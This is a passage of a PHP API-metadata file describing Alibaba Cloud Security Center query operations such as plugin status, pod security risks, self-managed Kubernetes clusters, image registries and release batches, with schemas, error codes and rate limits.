['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOssScanConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OssScanConfig', 'arn' => 'acs:yundun-sas:*:{#accountId}:ossscanconfig/*'], ], ], ], ], ], 'ListPluginForUuid' => [ 'summary' => 'Query plugin information of an asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'bdb7071f-129d-4ceb-af80-4cf70c4571c6', 'title' => ''], ], [ 'name' => 'Types', 'in' => 'query', 'style' => 'simple', 'schema' => [ 'description' => 'The list of plugin types.', 'type' => 'array', 'items' => ['description' => 'The plugin type. Valid values:'."\n" ."\n" .'- **auto_breaking**: antivirus type'."\n" .'- **ransomware_breaking**: anti-ransomware (bait capture)'."\n" .'- **webshell\\_cloud_breaking**: website backdoor connection defense'."\n" .'- **alisecguard**: client self-protection'."\n" .'- **alinet**: malicious network behavior defense', 'type' => 'string', 'required' => false, 'example' => 'auto_breaking', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned by the request.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used for troubleshooting and problem locating.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'AegisUuidTargetPluginConfigList' => [ 'description' => 'The list of plugin information.', 'type' => 'array', 'items' => [ 'description' => 'The plugin information.', 'type' => 'object', 'properties' => [ 'PluginName' => ['description' => 'The name of the plugin type. Valid values:'."\n" ."\n" .'- **alihips**: performs virus and trojan protection'."\n" .'- **alisecguard**: performs attack protection'."\n" .'- **alinet**: protects against network-side attacks on the server', 'type' => 'string', 'example' => 'alisecguard', 'title' => ''], 'PluginOnlineInstalled' => ['description' => 'Indicates whether the plugin is installed. Valid values:'."\n" .'- **true**: installed'."\n" .'- **false**: not installed', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'PluginOnlineStatus' => ['description' => 'Indicates whether the plugin is online. Valid values:'."\n" .'- **true**: online'."\n" .'- **false**: offline', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'PluginInstallCode' => ['description' => 'The installation code of the plugin instance.', 'type' => 'string', 'example' => 'k5O5nd', 'title' => ''], 'PluginVersion' => ['description' => 'The plugin version.', 'type' => 'string', 'example' => '00_10', 'title' => ''], 'AegisSuspiciousConfigList' => [ 'description' => 'The list of plugin configuration information.', 'type' => 'array', 'items' => [ 'description' => 'The plugin configuration information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The name of the plugin type. Valid values:'."\n" ."\n" .'- **alihips**: performs virus and trojan protection'."\n" .'- **alisecguard**: performs attack protection'."\n" .'- **alinet**: protects against network-side attacks on the server', 'type' => 'string', 'example' => 'alisecguard', 'title' => ''], 'Config' => ['description' => 'Indicates whether the plugin is enabled. Valid values:'."\n" .'- **true**: enabled'."\n" .'- **false**: disabled', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Msg' => ['description' => 'The authorization binding information of the plugin. Valid values:'."\n" ."\n" .'- **authorized**: authorized'."\n" .'- **unauthorized**: unauthorized'."\n" .'- **unbind**: unbound'."\n" .'- **nonsupport**: not supported', 'type' => 'string', 'example' => 'authorized', 'title' => ''], 'OverallConfig' => ['description' => 'Indicates whether this is a global configuration. Valid values:'."\n" .'- **true**: yes'."\n" .'- **false**: no', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset plugin information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPluginForUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListPluginForUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"AegisUuidTargetPluginConfigList\\": [\\n {\\n \\"PluginName\\": \\"alisecguard\\",\\n \\"PluginOnlineInstalled\\": true,\\n \\"PluginOnlineStatus\\": true,\\n \\"PluginInstallCode\\": \\"k5O5nd\\",\\n \\"PluginVersion\\": \\"00_10\\",\\n \\"AegisSuspiciousConfigList\\": [\\n {\\n \\"Type\\": \\"alisecguard\\",\\n \\"Config\\": true,\\n \\"Msg\\": \\"authorized\\",\\n \\"OverallConfig\\": true\\n }\\n ]\\n }\\n ],\\n \\"Code\\": 200,\\n \\"Message\\": \\"successful\\"\\n}","type":"json"}]', ], 'ListPodRisk' => [ 'summary' => 'Retrieves the security risks of pod groups.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page when paging is used. Default value: 20.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c314aa5b2f208461dad821cdfed82****', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The Kubernetes cluster namespace.', 'type' => 'string', 'required' => false, 'example' => 'taas', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The application name.', 'type' => 'string', 'required' => false, 'example' => 'nginx1', 'title' => ''], ], [ 'name' => 'PodName', 'in' => 'query', 'schema' => ['description' => 'The pod name.', 'type' => 'string', 'required' => false, 'example' => 'abcd-84898334227-p****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '94254AD7-5026-5847-833B-403C2326BD6E'], 'PodRiskList' => [ 'description' => 'The security risks of pod groups.', 'type' => 'array', 'items' => [ 'description' => 'The security risks of pod groups.', 'type' => 'object', 'properties' => [ 'Pod' => ['description' => 'The pod group name.', 'type' => 'string', 'example' => 'expoit-xxx-b****', 'title' => ''], 'NodeName' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c1d903a628af043659a043af59d89****', 'title' => ''], 'PodIp' => ['description' => 'The IP address of the pod group.', 'type' => 'string', 'example' => '172.0.XXX.XXX', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when the pod group was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1644283112720', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'test66', 'title' => ''], 'Namespace' => ['description' => 'The Kubernetes namespace.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities in the pod group.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts in the pod group.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline issues in the pod group.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the node.', 'type' => 'string', 'example' => 'i-7yvdq597****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '2-', 'title' => ''], 'CurrentPage' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve security risks of pod groups', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPodRisk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListPodRisk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"94254AD7-5026-5847-833B-403C2326BD6E\\",\\n \\"PodRiskList\\": [\\n {\\n \\"Pod\\": \\"expoit-xxx-b****\\",\\n \\"NodeName\\": \\"test\\",\\n \\"ClusterId\\": \\"c1d903a628af043659a043af59d89****\\",\\n \\"PodIp\\": \\"172.0.XXX.XXX\\",\\n \\"CreateTime\\": 1644283112720,\\n \\"ClusterName\\": \\"test66\\",\\n \\"Namespace\\": \\"kube-system\\",\\n \\"VulCount\\": 1,\\n \\"AlarmCount\\": 10,\\n \\"HcCount\\": 1,\\n \\"InstanceId\\": \\"i-7yvdq597****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 29,\\n \\"Count\\": 20,\\n \\"PageSize\\": 0,\\n \\"CurrentPage\\": 1\\n }\\n}","type":"json"}]', ], 'ListPrivateK8s' => [ 'summary' => 'Retrieves information about self-managed Kubernetes clusters that are connected to Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], 'PrivateK8sInfos' => [ 'description' => 'The list of private Kubernetes cluster information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'VpcId' => ['description' => 'The ID of the VPC-connected instance.', 'type' => 'string', 'example' => 'vpc-2zet5l358k6z0gnz*****', 'title' => ''], 'ApiServerIp' => ['description' => 'The IP address of the API server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'K8sVersion' => ['description' => 'The Kubernetes version.', 'type' => 'string', 'example' => '1.18', 'title' => ''], 'NetType' => ['description' => 'The network type. Valid values:'."\n" .'- **1**: public network'."\n" .'- **2**: VPC.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'KubeConfig' => ['description' => 'The configuration information of the Kubernetes server.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'AliUid' => ['description' => 'The UID of the user.', 'type' => 'integer', 'format' => 'int64', 'example' => '12345', 'title' => ''], 'Id' => ['description' => 'The ID of the policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve private kubernetes cluster information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateK8s'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListPrivateK8s', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\",\\n \\"PrivateK8sInfos\\": [\\n {\\n \\"VpcId\\": \\"vpc-2zet5l358k6z0gnz*****\\",\\n \\"ApiServerIp\\": \\"192.168.XX.XX\\",\\n \\"K8sVersion\\": \\"1.18\\",\\n \\"NetType\\": 1,\\n \\"ClusterName\\": \\"xxx\\",\\n \\"KubeConfig\\": \\"xxx\\",\\n \\"AliUid\\": 12345,\\n \\"Id\\": 1,\\n \\"RegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListPrivateRegistryList' => [ 'summary' => 'Retrieves image repositories.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'RegistryType', 'in' => 'query', 'schema' => ['description' => 'The type of the image repository. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" ."\n" .'- **harbor**: Harbor'."\n" ."\n" .'- **quay**: Quay'."\n" ."\n" .'- **CI/CD**: Jenkins', 'type' => 'string', 'required' => false, 'example' => 'harbor', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique ID generated by Alibaba Cloud for the request. Use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], 'ImageRegistryInfos' => [ 'description' => 'An array of private image registries.', 'type' => 'array', 'items' => [ 'description' => 'A private image registry.', 'type' => 'object', 'properties' => [ 'VpcId' => ['description' => 'The ID of the VPC instance.', 'type' => 'string', 'example' => 'vpc-bp12897gqrex01zn0****', 'title' => ''], 'Token' => ['description' => 'The user authentication token.', 'type' => 'string', 'example' => '0da12bce-cc36-4c48-b3e6-2215fc3a****', 'title' => ''], 'WhiteList' => ['description' => 'The IP whitelist.', 'type' => 'string', 'example' => '100.104.XXX.XXX', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894******', 'title' => ''], 'RegistryType' => ['description' => 'The image registry type. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" ."\n" .'- **harbor**: Harbor'."\n" ."\n" .'- **quay**: Quay'."\n" ."\n" .'- **CI/CD**: a CI/CD registry', 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'DomainName' => ['description' => 'The domain name of the image registry.', 'type' => 'string', 'example' => 'example.com', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image registry.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Password' => ['description' => 'The password for the image registry.', 'type' => 'string', 'example' => 'Harbor******', 'title' => ''], 'NetType' => ['description' => 'The network type. Valid values:'."\n" ."\n" .'- **1**: public network'."\n" ."\n" .'- **2**: VPC', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RegistryVersion' => ['description' => 'The version of the image registry. Valid values:'."\n" ."\n" .'- **V1**: Version 1.0'."\n" ."\n" .'- **V2**: Version 2.0', 'type' => 'string', 'example' => 'V1', 'title' => ''], 'ProtocolType' => ['description' => 'The protocol type. Valid values:'."\n" ."\n" .'- **1**: http'."\n" ."\n" .'- **2**: https', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RegistryHostIp' => ['description' => 'The IP address of the image registry.', 'type' => 'string', 'example' => '114.55.XXX.XXX', 'title' => ''], 'UserName' => ['description' => 'The username for the image registry.', 'type' => 'string', 'example' => 'RegistryUser', 'title' => ''], 'Id' => ['description' => 'The unique ID of the image registry.', 'type' => 'integer', 'format' => 'int64', 'example' => '66485', 'title' => ''], 'RegistryName' => ['description' => 'The alias of the image registry.', 'type' => 'string', 'example' => 'test1', 'title' => ''], 'PersistenceDay' => ['description' => 'The asset retention period in days.', 'type' => 'integer', 'format' => 'int64', 'example' => '90', 'title' => ''], 'JenkinsEnv' => ['description' => 'The Jenkins environment information.', 'type' => 'string', 'example' => 'JenkinsInfo', 'title' => ''], 'TransPerHour' => ['description' => 'The number of scan tasks per hour.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Port' => ['description' => 'The port number.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\",\\n \\"ImageRegistryInfos\\": [\\n {\\n \\"VpcId\\": \\"vpc-bp12897gqrex01zn0****\\",\\n \\"Token\\": \\"0da12bce-cc36-4c48-b3e6-2215fc3a****\\",\\n \\"WhiteList\\": \\"100.104.XXX.XXX\\",\\n \\"AliUid\\": 0,\\n \\"RegistryType\\": \\"harbor\\",\\n \\"DomainName\\": \\"example.com\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Password\\": \\"Harbor******\\",\\n \\"NetType\\": 1,\\n \\"RegistryVersion\\": \\"V1\\",\\n \\"ProtocolType\\": 1,\\n \\"RegistryHostIp\\": \\"114.55.XXX.XXX\\",\\n \\"UserName\\": \\"RegistryUser\\",\\n \\"Id\\": 66485,\\n \\"RegistryName\\": \\"test1\\",\\n \\"PersistenceDay\\": 90,\\n \\"JenkinsEnv\\": \\"JenkinsInfo\\",\\n \\"TransPerHour\\": 30,\\n \\"Port\\": 80\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListPrivateRegistryList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateRegistryList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListPrivateRegistryList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListPrivateRegistryType' => [ 'summary' => 'Queries the number of image repositories of each type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Chinese Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413****', 'title' => ''], 'RegistryTypeInfos' => [ 'description' => 'The information about image repository types.', 'type' => 'array', 'items' => [ 'description' => 'The information about image repository types.', 'type' => 'object', 'properties' => [ 'RegistryType' => ['description' => 'The type of the image repository. Valid values:'."\n" ."\n" .'- **acr**: ACR.'."\n" .'- **harbor**: Harbor.'."\n" .'- **quay**: Quay.'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'Count' => ['description' => 'The number of image repositories.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of image repositories of each type', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateRegistryType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListPrivateRegistryType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413****\\",\\n \\"RegistryTypeInfos\\": [\\n {\\n \\"RegistryType\\": \\"harbor\\",\\n \\"Count\\": 2\\n }\\n ]\\n}","type":"json"}]', ], 'ListPublishBatch' => [ 'summary' => 'Queries the custom upgrade and release batches of the current user.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'UpgradeVersion', 'in' => 'query', 'schema' => ['description' => 'The target version to upgrade to.', 'type' => 'string', 'required' => true, 'example' => '0.0.9', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'BatchName', 'in' => 'query', 'schema' => ['description' => 'The name of the release batch.', 'type' => 'string', 'required' => false, 'example' => '批次1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. The China Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BatchList' => [ 'description' => 'The details of the batch release tasks.', 'type' => 'array', 'items' => [ 'description' => 'The details of the batch release tasks.', 'type' => 'object', 'properties' => [ 'Version' => ['description' => 'The target version to upgrade to.', 'type' => 'string', 'example' => '0.0.9', 'title' => ''], 'BatchName' => ['description' => 'The name of the release batch.', 'type' => 'string', 'example' => '发布批次1', 'title' => ''], 'BatchId' => ['description' => 'The ID of the release batch.', 'type' => 'integer', 'format' => 'int64', 'example' => '1371', 'title' => ''], 'BatchNo' => ['description' => 'The number of the current batch in a phased release.', 'type' => 'integer', 'format' => 'int32', 'example' => '2147483647', 'title' => ''], 'BatchTotal' => ['description' => 'The total number of batches in the release.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'BatchInterval' => ['description' => 'The interval between the completion of the current batch and the start of the next batch. Unit: hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'BatchProcess' => ['description' => 'The release progress of the current batch, indicating the number of machines that have been released.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'Status' => ['description' => 'The release status of the client. Valid values:'."\n" .'- **0**: not started'."\n" .'- **1**: releasing'."\n" .'- **2**: release completed'."\n" .'- **3**: release paused'."\n" .'- **4**: force upgrading.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'OperationBase' => ['description' => 'The dimension for asset selection. Valid values:'."\n" ."\n" .'- **0**: machine instance'."\n" .'- **1**: machine group'."\n" .'- **2**: VPC-connected instance ID.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query release batches', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPublishBatch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListPublishBatch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 25\\n },\\n \\"BatchList\\": [\\n {\\n \\"Version\\": \\"0.0.9\\",\\n \\"BatchName\\": \\"发布批次1\\",\\n \\"BatchId\\": 1371,\\n \\"BatchNo\\": 2147483647,\\n \\"BatchTotal\\": 3,\\n \\"BatchInterval\\": 12,\\n \\"BatchProcess\\": 12,\\n \\"Status\\": 1,\\n \\"OperationBase\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'ListRdDefaultSyncList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213240', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned if the call is successful.'."\n", 'type' => 'object', 'properties' => [ 'FolderIds' => ['description' => 